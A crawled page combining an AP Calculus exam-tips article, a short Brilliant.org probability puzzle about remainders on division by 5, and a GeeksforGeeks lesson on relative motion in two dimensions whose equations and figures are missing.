$Y=f\left(x\right)={x}^{ 3}+{x}^{2}$ ?
$\int{Ydx}=\dfrac{{x}^{4}}{4}+\dfrac{{x}^{ 3}}{3}+C$
## AP Calculus Multiple-Choice Review Tips
In this section we review some specific tips regarding the multiple-choice portions of the AP Calculus exam. Although some of these may also be extended to the FRQ portion, these tips are more tailored to the multiple-choice questions on the test.
1. Understand what the question is asking: Make sure that you read the question carefully and understand what they are asking for. Usually this is easier with mathematics type exams since math is more symbolic in nature. So it should be quite easy and apparent when you are trying to understand an AP Calculus question.
For example: What is the value of $f^{'}\left(x\right)$ for the function $f\left( x \right) =3{x}^{3}+{x}^{2}+4$ at the point $x =4$?
In this example they are asking for the numerical value of the first derivative of the function at a particular point. So you will first need to find the first derivative of the function $f\left(x\right)=3{x}^{3}+{x}^{2}+4$ which is $f^{'}\left(x\right)=9{x}^{ 2}+2x$ and then plug in the value $4$ for $x$ into the first derivative equation. Therefore, the answer is $f^{'}\left(x\right)=152$ at $x = 4$.
2. The Process of Elimination Technique (POE): If you really know your stuff you will normally not need to use this technique. However, there are almost always a few problems that you may be having trouble with on the exam and this technique would definitely come in very handy. If there are answers that are obviously wrong it would be a good idea to place a mark on those answers telling you that they are incorrect. Since there are five possible answers to each multiple-choice question, eliminating one answer increases your odds by 20%. Not too shabby! Eliminating two answers increases your odds of a correct response by 40% and so on. Again, use this technique only if necessary. Otherwise, solve the problem and choose the correct answer.
4. Use an AP Calculus study guide or textbook to prepare: Using a study guide or a good textbook can be a tremendous help in getting a high score on your AP Calculus exam. The reason for this is that many of the types of problems that occur on the AP Calculus exam come from these study guides. You can find many of them on the internet by doing a simple internet search. The most important thing to remember is that the more problems you do at home or with a study partner, the better your chances will be for getting a high score. Using tip will also give you exposure to the types of problems that will appear on the AP Calculus exam. This leads us to the next tip.
5. Know the different types of calculus problems: There are many different types of Calculus problems. One of the most common is the min/max problem. These problems require you to find the derivative of a specified function and set it equal to zero. You would then solve the resulting equation (the derivative) to find its roots and apply these roots to the original function to determine the min or max. Another common type of problem is that of finding limits of functions. Starting in 2016, the Calculus AP exam will contain problems relating to L’Hôpital’s rule. This is a great way of determining the limit of a function divided by another function. You can visit this page to understand how to use L’Hôpital’s rule when finding the limit of a quotient of two functions. The other types of problems found on the AP exam are the following: continuity of functions, asymptotic functions, antidifferentiation and the Fundamental Theorem of Calculus.
6. Understand and master the Chain Rule: It is very important that you know how to use the Chain Rule. This rule is used for the computation of derivatives of the composition of two or more functions. See this page for more information on how to use the Chain Rule. Knowing this rule will allow you to easily calculate the derivative of a multi-functioned problem containing at least two or more functions and their respective variables.
7. Identify your weaknesses: If there are certain types of AP Calculus problems you generally have issues with, practice doing more of those before taking the AP Calculus exam. Focus on the underlying concept of these (or any other) problems. Mastering and understanding the underlying and fundamental concepts of AP Calculus will greatly help you improve your score.
8. Review AP Calculus practice multiple choice questions online: One of the best ways to prepare for the multiple choice portion of the AP Calculus exam is to use online practice sites. These sites either have actual past AP Calculus multiple choice questions or they are modeled to be strikingly similar to past exams. Here is one such site with the 2006 AP Calculus practice exams along with the key to the answers. Going through each and every problem on this one website is like the equivalent of taking the AP Calculus test a total of five times! You get a real flavor of what to expect on the actual AP Calculus exam if you go through these problems one by one. In this manner, you will also be keen as to what types of problems you can expect to find when you take your own exam.
9. Study the multiple-choice problems in the 2016 College Board AP Calculus course description: The course description manual published by College Board AP covers both AP Calculus AB and AP Calculus BC exams. It contains just about all of what you’ll need in order to get the best possible idea of taking the actual exam, the philosophy and principles behind it and a number of multiple choice and FRQ examples. We strongly recommend that you read and understand the entire document and then do the sample questions. Better still, we also recommend that you time yourself. Part A of the multiple-choice section contains 30 questions (60 minutes) and Part B contains 15 questions in (45 minutes).
## AP Calculus Free Response Question Tips
The following tips are specifically designed to help you master the FRQ section of the exam. An FRQ is like a series of multiple-choice questions with the caveat that the FRQ is fashioned in the form of a chain of reasoning exercise. In essence, the FRQ is digging deeper in attempting to assess your more global understanding of Calculus.
1. Practice released FRQs: Visit AP Central here for examples of the AP Calculus Free Response Questions from 1999-2016. These will give you the best idea of what to expect on your exam. If you have trouble or need more advice, review these walkthroughs and tips from Stacey Roshan.
2.Underline key equations: FRQs for the AP Calculus exam are essentially word problems that come in multiple parts. They are usually between 3-5 parts per FRQ. The first thing you should do is underline any key equations that are given. FRQs are designed to test your ability for an “extended chain of reasoning”.
3. Show all your work: Since partial credit is given for FRQ’s it is especially important to show all of your work. For example, you may be given a function $f\left(x\right)$ and will need its derivative $f^{'}\left(x\right)$. Make sure that you actually write down the first derivative $f^{'}\left(x\right)$ and underline or box it in since it will be an important equation you will need for the other parts of the problem. Here is an actual example from the College Board website. Your work should be clearly written in the space provided and your answers also should be provided in the proper space. Sometimes you will be asked to justify your answer. In this case briefly describe how you arrived at the answer. Indicate what concepts or equations you used to get to the correct answer. We recommend placing the words “Final Answer” or the letters “FA” right next to the boxed in final answers. This will make it very clear to the graders of your exam that this is your final answer.
4. Budget your time: You will have a total of six FRQs. Part A will contain two FRQs and is 30 minutes long (calculator permitted). Part B will contain four FRQs (calculator not permitted) and is one hour long. Important note! If you still have time when you finish Part B, you are allowed to go back and finish Part A if you need to. Try to spend no more than 10 minutes per FRQ. This will allow you some time to re-visit a particular question.
5. Read the data and question parts slowly and carefully: The AP Calculus Free Response Question has essentially two parts. The first part is he data or information needed to solve the individual problems. The second part is the individual questions. You will need to understand both parts in order to correctly answer and provide solutions to all of the questions.
6. Be specific and brief in your justification answers: If you are asked to justify your answer, don’t write a book about it! Be brief and to the point. Make sure you include all pertinent aspects of how you arrived at the solution. For example, if you are asked to provide justification on how you determined that a certain polynomial function has a max or a min at a certain point you must show the individual steps you took in order to arrive at the solution. To do this, make a table showing the original function, the function’s first derivative and its roots and all of the critical points. Then finally show how you determined that the point was a min or max. See the example below:
Find the absolute maxima and minima of the function:
$f\left(x\right) ={x}^{3}-6{x}^{2}+9x+2,\quad 0\le x\le 4$ .
Take the first derivative:
$f^{'}\left(x\right) =3{x}^{2}-12x+9$ .
Find the roots which are:
$x = 1$ and $x = 3$.
These are the only critical points of $f$. We consider the following table of the endpoints and the critical points of $f$:
#### $f(x)$
$0$ $2$
$4$ $6$
$1$ $6$
$3$ $2$
the absolute maximum occurs at both $x = 1$ and $x = 4$ and is $6$ and the absolute minimum occurs at both $x = 0$ and $x = 3$ and is $2$.
7. Pay attention to details: Don’t forget to give units if required. For example, if they ask you how many cubic feet of water are flowing through a pipe at a certain time, make sure that your final answer includes both the number and the units. In this case the units would be ft3. Another example would be to include the constant C whenever you integrate a given function. Leaving the C out will cost you points. Also, and this is especially important, make sure that your standard Calculus notations are correct and complete. For example, $\frac{{d }^{2}}{{dx}^{2}}f\left(x\right) =\frac{d}{dx} f^{ '}\left(x\right) =f^{''}\left(x\right)$
8. Rounding of numerical answers: Make sure that any numerical answers are given to the nearest thousandth (3 places after the decimal point). Also, store any interim values in your calculator and use those numbers to calculate the final answer. You will lose points if your answers are not properly rounded.
9. Be neat when working on FRQs: Try to be as neat as possible when showing your work or answers on Free Response Questions. This is good for two important reasons. Firstly, if the graders cannot read your work they will not give you partial credit. Secondly, it is good for you because if you have made a mistake on the early part of a question, say section (a), then your answers for sections (b), (c) and (d) will be wrong as well since the FRQs are designed to challenge your chain of reasoning.
10. Make up your own problems and then solve them: This may sound silly but it will actually test your true aptitude in Calculus. Start with making up your own polynomial equation and then find its first derivative. Then, in order to prove to yourself that you understand the Fundamental Theorem of Calculus, take the integral of the derivative you just found. You should, of course, come up with the original polynomial. Take this a step further and make the original function more complex. Take a polynomial and multiply or divide it by a trigonometric function. Write it down and try taking its derivative. Once you have gotten an answer, plug in some numerical values and then check it with your calculator. Just think of how many possibilities you could come up with. Stick with reasonable expressions and don’t overdo it. Write all of your work down on a piece of paper and keep it as your own personal study guide.
11. Never forget +C. When integrating a function, remember that you need to account for an arbitrary constant C. It may seem frivolous after you’ve done more complex calculations, but it’s not. Check through your answers at the end of the section to make sure you have included a constant when necessary. I often forgot this during the school year, so I made sure to commit it to memory while studying. When the test arrived, I was incredibly glad I had. C is a crucial part of the equation and you will be marked down if you forget it!
[bctt tweet=”When integrating a function, remember that you need to account for an arbitrary constant C.”]
12. Don’t doodle! Many students feel discouraged and think it funny to draw instead of answering the question, try not to do this. Doodling is the equivalent of leaving a multiple choice question blank — that is, you will get zero points no matter what. Even if you’re stumped, try rewriting what you know and brainstorming some ways you might be able to solve it. You might get a couple of points anyway. Better yet, you might have an insight that helps you work through the problem.
13. Memorize the key derivatives and integrals of common trigonometric and other functions: This tip is very important because it will save you time by not having to explicitly derive already known expressions. They will almost certainly appear on the AP Calculus exam so it is best that you know them by heart much like you learned multiplication tables in grade school using flash cards. You can also memorize these key derivatives and integrals by simply writing them down in your personal notes. Whenever you study for the AP Calculus exam, take the time to memorize, but more importantly, to understand the following:
## Tips by AP Calculus Teachers
The following are a collection of tips specifically designed for the student to optimize his/her performance on the AP Calculus exam. Most all of the tips are from the writer of this article. I first learned Calculus at the age of 16 and was self-taught in the beginning. I also searched the internet extensively as it related to the AP examination process in order to get more authoritative sources such as College Board AP Central.
1. Relax and Enjoy! I know it sounds somewhat counterintuitive to enjoy taking a test but it’s actually very possible to do. Remember, you are taking this exam because you are smart and because you may even enjoy Calculus. Think of taking the exam as an opportunity and not a chore or commitment. You should put yourself in the frame of mind that it is an honor for you to be taking the exam in the first place and you now have that great opportunity to demonstrate your advanced skills. Stay positive in your thinking and simply focus on each individual question as if it were like any other test you have taken in school.
2. Prepare yourself both mentally and physically: A few days before you actually take the exam, try not to think of it constantly. Doing so will only increase your anxiety level. Make sure that you relax your mind and get a good night’s sleep the night before the exam. Remember that taking the exam is an opportunity and not a necessity. While taking the exam keep this theme in mind and focus only on getting the correct answers. That should be your only goal.
3. Do as many problems as possible beforehand: Six to eight weeks before the exam start your preparation by doing a few Calculus problems each day. Make a habit of it. It will only take an hour a day and you will be ready and ultimately rewarded with a high score on the AP exam. You must do your due diligence and get in the groove of doing the problems each day during this time period. Don’t worry, be patient, practice daily and you’ll be well on your way to success. The score of 4 or 5 on the Calculus AP exam will happen by itself if you take this advice and persevere.
4. Be extremely confident in yourself: In order to get a good grade on any important standardized exam, you need to be extremely confident in yourself. Think positively by saying to yourself, “I know I can get a 4 or 5 on this AP Calculus test because I have prepared so well and for so long to get this far”. Also, say to yourself, “I’ve done so well on all the other exams I’ve taken so why not just treat this exam like those?” Speak with your friends and tell them how much you are looking forward to taking the exam. Their responses will not only reinforce your confidence levels but also will make you feel better about taking the exam with the expectation of achieving a 4 or 5.
5. Focus on learning and understanding fundamental concepts: This is the most important tip I give to all my students. Calculus is all about solid, valid and proven concepts. Know that the derivative of a function at a certain point is the slope of the line that is tangent to that curve at that point. Know that integration is the inverse of differentiation and vice versa. Also know that the net area bounded by the curve between any two points on the curve is equal to the definite integral between those two points. See Wikipedia.
6. Review past math concepts: It is also a great idea to make sure that you are still fluent with the other math courses and concepts you have learned in the past. Surely you will want to be familiar with advanced algebra and graphing polynomials. You will also want to make sure that your trigonometry is up to par. Many Calculus problems will use trig functions so it would be best for you to review trigonometric identities and common trigonometric formulas. Thanks for the tip from the folks at the College Board.
7. Study with friends or other students: If any of your fellow friends or students will also be taking the AP Calculus exam, it would be a great idea for you to get together with them every so often and do some problems together. Remember the old saying that “Two heads are better than one”. Studying with other people with the same goals is great because it adds an element of personality to your academic understanding of a particular subject matter. Most serious students do this during High School or College and it also helps take the stress out of the anticipation of taking such a high-level exam such as AP Calculus. Thanks for the tip from the folks at the College Board.
8. Use outside resources: You should always use outside sources for preparing for the AP Calculus exam. Relying on only one textbook would give you a narrower understanding of the types of problems that might occur on the AP test. Remember that the AP exam is prepared by a committee that likely uses multiple resources to create the problems. You should also diversify your portfolio, so to speak, and use the internet or other good textbooks on Calculus. There are scores of websites devoted to sample Calculus problems. I would visit as many as possible without over doing it of course. Thanks for the tip from the folks at the College Board.
9. Ask for help: If you are having difficulty with certain types of problems then it would be a good idea to seek help. You might want to schedule some time with your teacher at school or perhaps look into hiring a good Calculus tutor. Thanks for the tip from the folks at the College Board.
10. Help other students: Besides just getting together with other students or friends for a Calculus studying session, it would be good for you to help other students that may be having problems with understanding Calculus. If you are very comfortable with having an above average understanding and knowledge of Calculus, it would be great for you to help someone else out. This would be a win-win situation for both of you since teaching a subject matter always reinforces the concepts with yourself. You will gain additional confidence and understanding of the basic principles of Calculus by teaching someone else. Thanks for the tip from the folks at the College Board.
11. Learn from students that have taken the test before: You may already know some people that have taken the AP Calculus exam before. If so, speak with them about their experience in taking the exam. They may have some tips for you as well. Ask them questions like, “What types of problems were on the test?” or “Did you have enough time to finish all of the problems?”. You may also ask them if they thought the test was easy or difficult. Try to get as much information from them as you can. It certainly can’t hurt. Thanks for the tip from the folks at the College Board.
12. Don’t procrastinate: Some students are better than others at not procrastinating. Make sure that you are serious about preparing for the exam way in advance and start doing problems on a daily or otherwise frequent basis. It is important that you stick to a plan and execute it properly. Don’t say to yourself, “Oh, I already know this stuff so I will put it off until the week before the exam”. If you do that, it will definitely ensure that you will not be fully prepared for the exam. Always remember that practice makes perfect and just make sure that you do a lot of practicing. Again, like I said before, the more you practice, the better are your chances of getting a 4 or 5 on the AP Calculus exam. Good luck!
13. Answer all questions: When you are finished with the exam, make sure that all questions have an answer. If you leave a question blank you will not get any points for that question. This could make the difference between a 4 or a 5 score if you leave too many questions unanswered. Thanks for the tip from the folks at the College Board.
14. Wear a watch: Although there may be a clock on the wall in the room, there is no guarantee. Even if they do have a clock in the room it would be a lot better if you were to simply look down at your wrist rather than looking up to the wall clock all the time. Thanks for the tip from the folks at the College Board.
15. If you feel overwhelmed or your hand cramps, take a short break. Taking thirty seconds to shake out your wrist after all that writing and look up from your paper will not be harmful. It’s a timed test, but it’s not a time trial. Taking short breaks when you feel confused allow you to clear your head and relax.
16. Remember, you don’t need to score 100% to pass. The AP Calculus test is supposed to be difficult. While you might have done very well on unit tests in your Calculus class, most people do not score nearly as well on the AP test. This is how it is designed. To receive a 5 in recent years, examinees have only needed to answer 63% of material correctly. This is not a test to ensure you know everything, but to measure what you do.
17. When it’s done, relax and celebrate! Once you have turned in your exam, there is nothing more you can do for a couple of months. Do not worry too much about your results until they come out. You have worked hard all year to earn college credit, and now your studying and practice has paid off!
18. Work AP problems ALL YEAR LONG! Don’t wait until the end of the year for the review. We review by chapter, the day before or after each test. Thanks for the tip from Ms. Gisella C. from Boca Raton Community High.
19. When things get difficult, focus on what you DO know as a starting point–not what you don’t. Pull together the ideas of what you DO know and good things will happen. Thanks for the tip from Aaron P. from Crystal Lake Central High.
20. Be sure to label all work correctly. For instance, it you taking the derivative be sure to label f prime (x) . Setting up an integral use the integral symbol etc. As a reader it is amazing how many students work a problem with no labeling or worse mix f and f prime. Thanks for the tip from Mr. Waddell.
21. Review all formulas the night before the exam and then go to sleep. No need to try to cram…you just can’t for this test. It’s what I always tell them. Well, that and to learn every little detail about every little Calculus theorem there is. Thanks for the tip from Pamela L. from Ralph L. Fike High.
22. In doing derivatives, I always stress the difference between $y = x^n$, $y = a^x$, $y = a^n$, and $y = x^x$All of them look similar, but different rules apply: Power Rule, Exponential Rule, Constant Rule, and Logarithmic Differentiation. I usually do this by presenting 4 specific problems on the board, such as the ones with n = e, a = pi. I ask them which rules apply. They always try to use the power rule on all 4. However, with practice at the board, they get the difference. Thanks for the tip from Ron T.
23. If a student boxed in an answer on the FRQ’s, that was the only answer we could consider. Too many students had the correct answer elsewhere and I could read that answer, unless they had a boxed in answer. Thanks for the tip from Laura S. from Chatham High.
24. Learn the language and vocabulary, because half of the battle is knowing what a question is asking and/or telling you! Give yourself the benefit of analyzing the information presented in a question, because then you can execute on the knowledge and skills that you have practiced! Thanks for the tip from Brittany A. at YesPrep Public Schools.
25. The best thing I can think is for students to practice “AP level” problems as much as possible. Students should find past AP tests, the AP course description or review books and do as many problems as they can. Thanks for the tip from Richard S.
26. There may be stuff on the test that you do not know. That is okay. Just don’t panic and do well on the stuff you do know how to do. Thanks for the tip from Ned E. from Lebanon High.
27. Relax and don’t be afraid of making mistakes…you are sharper than you think. Thanks for the tip from Ms. L.
28. Have the unit circle memorized so that you can fill in a blank one in 5 minutes or less. It will save you precious time on the AP exam. Thanks for the tip from Liesa K. at Art College Prep, Jill P., and Michelle J.
29. One tip I give them to be successful on the AP exam is to mentally get after it. They are a little confused at what I mean by that at first so I relate it to sports. If you are in a wrestling match, you ‘get after it’ physically. On the exam you get after it mentally. There are no times where you lose focus. Your mind is working it’s tail off. If you get tired or start to lose focus, you have to pep yourself up and get after it even harder. When the test is over, you will feel drained but proud of your efforts. Thanks for the tip from Brad S.
30. When you have worked the problem, do not write the answer until you go back and read the question. This applies to both parts of the test. Thanks for the tip from Mr. B.
31. The best tip I could give for the multiple choice sections is called “Triage.” On the first pass through the multiple choice problems, do only those you immediately and absolutely know how to do. Circle the ones that you cannot do without some effort. Make a second pass through, this time skipping those you feel you have no idea how to do. Go through the problems one last time and attempt those problems you believe to be most difficult. This makes the best use of your time and keeps you from expending mental energy early in the test on problems that are difficult. Thanks for the tip from Mr. G.
32. Do not simplify a numerical answer ! If you get 1(1) + 2(3) + 5cos 45…….stop!!! You are finished. I took away over 100 points when I graded the exam because students told me 1(1) = 2. Thanks for the tip from KC H. at Freedom Area High.
33. Don’t let AP readers guess at what you mean. Write the responses to your Free Response questions completely, leaving nothing to the readers imagination. Thanks for the tip from Ryan H. at Southern Lehigh High.
34. Don’t simplify your answers for the FRQs. Thanks for the tip from David O. at St. Johns Country Day School.
35. Questions have to do with one of the following areas: limits, derivatives, or integrals (definite or indefinite). If you get stuck on a problem, just ask yourself which of these the question is asking you to find. Thanks for the tip from Dan M. at Broad Run High.
36. AP stands for Always Practicing. You can not cram prior to the exam to be successful on any AP test. You must put the time and work in all year long. This includes weekends, holidays, and even snow days. If you have consistently done this, your scores will reflect your efforts. Thanks for the tip from Dan M. at Broad Run High.
37. The value of a limit of a function as x approaches “a” is NEVER the value of the y coordinate of an isolated “dot”. Thanks for the tip from James M.
38. EVERY point on the free response is its own little test. Write down all that you know and don’t get freaked out about stuff in an earlier part of a question you may NOT have known. STAY IN THE GAME! Thanks for the tip from Bo G.
39. THINK GRAPHICALLY. A picture IS worth a thousand words, and your ability to picture what is happening in the context of the problem will help you understand if the derivative should be negative or positive, if the value should be big or small, if the second derivative (acceleration in many cases) is positive or negative, if your integral value should be positive or negative, etc. To reason with a visual supports your algebra in many ways. Thanks for the tip from Chris L.
40. Sit on your ego! Know that you will be challenged and that it is not a reflexion on you! Thanks for the tip from Damien J.
41. The more you practice a variety of problems from different resources the better you begin to recognize and understand types of problems. Thanks for the tip from Kristy H.
42. Bring extra batteries for your calculator! Thanks for the tip from David P. at Torrey Pines High.
43. You must know the why and how, not just the what. Thanks for the tip from John S.
44. Don’t forget your calculator on exam day and be sure to put fresh batteries in it. Thanks for the tip from Dawn D. at FCHS.
45. Make sure your calculator is in radians (check the settings in general). Thanks for the tip from Dawn D. at FCHS.
46. Use your calculator when there are shortcuts to solving a problem rather than performing the calculus by hand. Thanks for the tip from Dawn D. at FCHS.
47. Answer only the question asked, don’t waste time doing something that isn’t needed or required to a problem. Thanks for the tip from Dawn D. at FCHS.
48. If a graph is given, be sure to identify which function it represents….is it the function or a derivative? Thanks for the tip from Dawn D. at FCHS.
49. Don’t oversimplify. The test doesn’t require it, and oversimplifying can use valuable time! Thanks for the tip from Misty P. at Virtual Virginia.
50. I would tell students to know their major theorems, both hypothesis and conclusion, cold. To me these are IVT, EVT, Rolle’s, MVT (derivatives), FTC I (including its use for Net Change on a rate), FTC II, and MVT (integrals). After that, practice justifying numerical and graphical problems on previous FRQs using the information given (Ex: Given a graph of f(x), do not simply say f'(x) is positive, say f'(x) is positive as the given graph, f(x), is increasing, thereby connecting your justification to the information given). Finish by checking your work with the sample 9/9 FRQ student response provided by the College Board. Thanks for the tip from Shaun B. at James Clemens High.
51. Use 3 decimal places. Thanks for the tip from Keith L. at SHHS.
52. Make sure students know that a critical number must be in the domain of the function. So in f(x) = (x + 5)/(x – 3), 3 cannot be a critical number. Thanks for the tip from Jane W.
53. On application questions with lots of information, highlight the units on the given functions (equation, graph, or table) in the problem and ask yourself what needs to be done (integrate or differentiate) in order to arrive at the correct units in your answer. Thanks for the tip from Joseph S.
54. Learn to do mental math. You save time on the Multiple Choice, no calculator part. Thanks for the tip from Leena G.
55. My tip is to never leave a free response question blank and if you are unsure what to do, set the given equation equal to zero and solve it and set the derivative of the given equation equal to zero and solve it. Thanks for the tip from Craig G.
56. Do Saturday work sessions by topic and give mock exams. Thanks for the tip from Valerie P.
57. On free response questions especially, practice understanding in words what you are doing mathematically. Like knowing by the words if they want a average rate of change or the average of the integral. Knowing how those are asked and what the answers mean, make it easier not only to answer the question but to justify the answer as well. Thanks for the tip from Natalie B. from Memorial Early College High.
58. Time can be your enemy. When taking practice exams, set your timer to give yourself 5 fewer minutes than you would when taking the actual exam. You’ll get used to working at a quicker pace and you’ll have extra time to check your work before time is called. Thanks for the tip from Mary B.
59. Realize this is not a UIL competition test. They are looking for a reason to give you credit for Calculus – not trying to make a test no one can make a 100 on. Practice being thorough in your answers so they can see you understand the concept. Thanks for the tip from Michael B.
60. Starting In January do one free response question a night. This attachment has the problems by topic, year, and number. Thanks for the tip from Eric H.
61. Continue to ask yourself WHY? as you progress through the topics. If you are doing that, and able to answer that, then you will continue to understand the concepts deeply, and the unique problems from the AP will be easily tackled. Thanks for the tip from Eric S.
62. Answer every part of a FRQ. Label each part a), b), c), etc. If there are multiple answers, roots, solutions, points to a single question, make sure to sum up your answers in one Box. Thanks for the tip from Mary S. from Grafton High.
63. The best tip I have for my students is to keep up with the current homework, homework is where most of your learning takes place. If you have questions make sure to ask them. Work with a buddy or buddies if you can and discuss your ideas. Catching up is very difficult. Thanks for the tip from Carolanne F.
64. Read the question carefully and answer it completely. – Many FR questions require the student to complete multiple tasks. Many students lose points because they do not answer the questions appropriately. Thanks for the tip from Jessica S. from Cypress Bay High.
65. Know the big concepts, but pay attention to the details. Show all work and do not skip steps. Thanks for the tip from Beth P. from Martin Luther King, Jr. Magnet School.
66. Here’s a tip I use to try to get kids to take a breath before starting a free response question: Basically, Calculus is derivatives and integrals, so ask yourself before doing any work, “Is this a derivative or an integral question?” Then, at least, they have somewhere to start. Thanks for the tip from Steve S. from Kents High.
67. The mean value theorem and its converse must be understood at all levels and one must be able to provide a simplistic physics example to explain it. Thanks for the tip from Jonathan H.
68. Limits must be understood to bind the whole of calculus together and must not be treated as the red headed step child, and this includes graphing them by hand using precalculus and algebra 2 rules and not being reliant on a calculator. Thanks for the tip from Jonathan H.
69. There are 3 phases of calculus: position, velocity, and acceleration. You must know which phase the problem is in currently and which phase you need to transform it to. This will help you decide if you are going to integrate or differentiate. Thanks for the tip from Rachael A.
70. Understanding graphs: keep in mind that a function can decrease while its derivative increases. Although tangent lines are getting less steep, their slopes are becoming less negative. Thanks for the tip from Mr. S.
71. Practice, practice, practice, and more practice. There are so many non-secure, practice multiple-choice and free-response questions available that there is no reason not to take full advantage of them in preparation for the exam. Exposure to the question formats, common notation/terminology, etc. is key to applying content knowledge for applicable scenarios and, ultimately, being successful on the actual exam. Thanks for the tip from Dominic B.
72. Even if you have the correct answer, linkage errors and presentation errors can make students lose points in the grading process. Go back and check for these before time is up. Linkage error example: 10 * 5 = 50 / 2 = 25 is a linkage error because 10 * 5 does not equal 50 / 2. You must start a new line rather than link them together; so 10 * 5 = 50; 50 / 2 = 25 Presentation error example: When doing limit problems, not putting the limit as h approaches 0 in front of each expression along the way to the answer results in a presentation error.Thanks for the tip from Doreen V.
Are you a teacher or student? Do you have an awesome tip? Let us know!
## Frequently Tested Concepts for the AP Calculus Exam
Differential Calculus
Properties of limits, Properties of derivatives, Domain and range, One-sided limits, Limits at infinity, Continuity, 3 Types of Discontinuities, Product rule, Quotient rule, Power rule, Chain rule, Even functions, Odd functions, Periodic functions, Trig derivatives and inverse trig derivatives, Implicit differentiation, Higher order derivatives, Mean Value Theorem, L’Hopital’s Rule, Tangent lines, Extreme Value Theorem, Newton’s method of approximation.
Integral Calculus
Indefinite integrals, U-Substitution Integration by parts, Exponential growth and decay, Definite integrals, Riemann sums, Trapezoidal method, Fundamental Theorem of Calculus #1, Fundamental Theorem of Calculus #2, Average Value, Disk method, Washer method, Shell method.
This Ultimate List of AP Calculus Tips was written for the express purpose of giving the AP Calculus student a strong competitive advantage when taking the exam. The academic world is especially competitive these days and it is critical that even the best of students read and understand these tips. Make sure to bookmark this page so that you can refer to it throughout the school year as you navigate your way through AP Calculus AB/BC. Best of luck!
### Looking for AP Calculus practice?
Kickstart your AP Calculus prep with Albert. Start your AP exam prep today.
Resources
|
2019-04-21 12:39:42
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 56, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5823608040809631, "perplexity": 633.780263844073}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-18/segments/1555578531462.21/warc/CC-MAIN-20190421120136-20190421142136-00332.warc.gz"}
|
https://brilliant.org/problems/inspired-by-nihar-and-sandeep/
|
# Inspired by Nihar and Sandeep
When a non-negative integer $$x$$ is divided by 5, we get a remainder $$y$$ such that the number $$x$$ can be represented as $$x=q×5+y$$. For an explicit example if $$x=41$$, then we have $$x=8×5+1$$. And note that the remainder, here, is 1.
If I give you three chances to enter the integer $$y$$, what is the probability that you will get the question right on the third attempt?
Clarification:
• You will have to come up with a valid option (a possible remainder which we get after division by 5) each time you enter an integer.
• The remainder is defined being bounded in the interval $$[0, 5)$$
×
|
2018-07-20 03:19:06
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.819288432598114, "perplexity": 161.41155700887697}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-30/segments/1531676591481.75/warc/CC-MAIN-20180720022026-20180720042026-00388.warc.gz"}
|
https://www.geeksforgeeks.org/relative-motion-in-two-dimension/?ref=lbp
|
## Related Articles
• CBSE Class 11 Syllabus
• CBSE Class 11 Maths Notes
• CBSE Class 11 Physics Notes
• CBSE Class 11 Biology Notes
• CBSE Class 11 | Computer Science – C++ Syllabus
# Relative Motion in Two Dimension
• Last Updated : 05 Aug, 2021
The motion of the bodies is not absolute or isolated. It is always described with respect to some reference. For example, the speed of a moving vehicle is measured with respect to the ground. The position is also measured with respect to a reference which is called the origin. A train moving has a velocity of 100 Km/h with respect to the ground, but if another train is moving at 150Km/h. The velocity of the first train will not be 100Km/h with respect to the person sitting on the second train. It is essential to study the relative motion of the objects. Let’s explore this concept in detail.
### Reference Frames
In physics, a frame of reference is an abstract coordinate system, and a set of physical reference points that uniquely fix the coordinate system help in standardizing the measurements with respect to that frame. Consider the figure below, the velocity of the cart with respect to the boy is non-zero, but the velocity of the cart with respect to the person sitting inside the car is zero.
### Relative Motion in One Dimension
Relative Motion in one dimension is the building block for calculations related to relative motions in more than one dimension. Vectors can be decomposed into their components and then this rule can be used to calculate the relative velocity in different directions. As an example, consider a person sitting on a train moving at 10m/s towards the east. Assuming that the east direction is chosen as the positive direction and the earth as a reference frame.
The velocity of the train with respect to the ground frame,
vTE = 10 m/s
Now let’s say a person on the train starts getting up and starts moving in the direction opposite to the train. He is moving at 2m/s inside the train. This velocity is with respect to the reference of the train’s frame. The velocity of the person is,
vPT = -2 m/s
These two vectors can be added to find the velocity of the person with respect to the earth. This is called relative velocity.
vPE = vPT + vTE
### Relative Motion in Two Dimensions
These concepts can be extended to two-dimensional spaces also. Given in the figure below, consider a particle P and reference frames S and S’. The position of the frame S’ as measured in S is rS’S, the position of the particle P as measured with respect to the frame S’ is given by rPS’ and the position of the particle P with respect to the frame of reference S is given by rPS,
Notice from the figure that,
rPS = rPS’ + rS’S
These vectors give us the formula for relative velocities too, differentiating the above equation,
Intuitively speaking, the velocity of a particle with respect to S is equal to the velocity of S’ with respect to S plus the velocity of the particle with respect to S.
Differentiating this equation again, the equation for the acceleration is given by,
The acceleration of a particle with respect to S is equal to the acceleration of S’ with respect to S plus the acceleration of the particle with respect to S.
### Sample Problems
